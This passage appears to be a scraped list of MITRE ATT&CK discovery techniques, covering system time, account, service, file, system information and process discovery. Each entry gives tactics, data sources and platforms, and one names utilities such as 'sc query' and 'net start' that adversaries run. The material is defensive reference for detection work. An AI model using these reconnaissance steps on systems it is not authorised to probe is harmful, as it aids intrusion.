Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre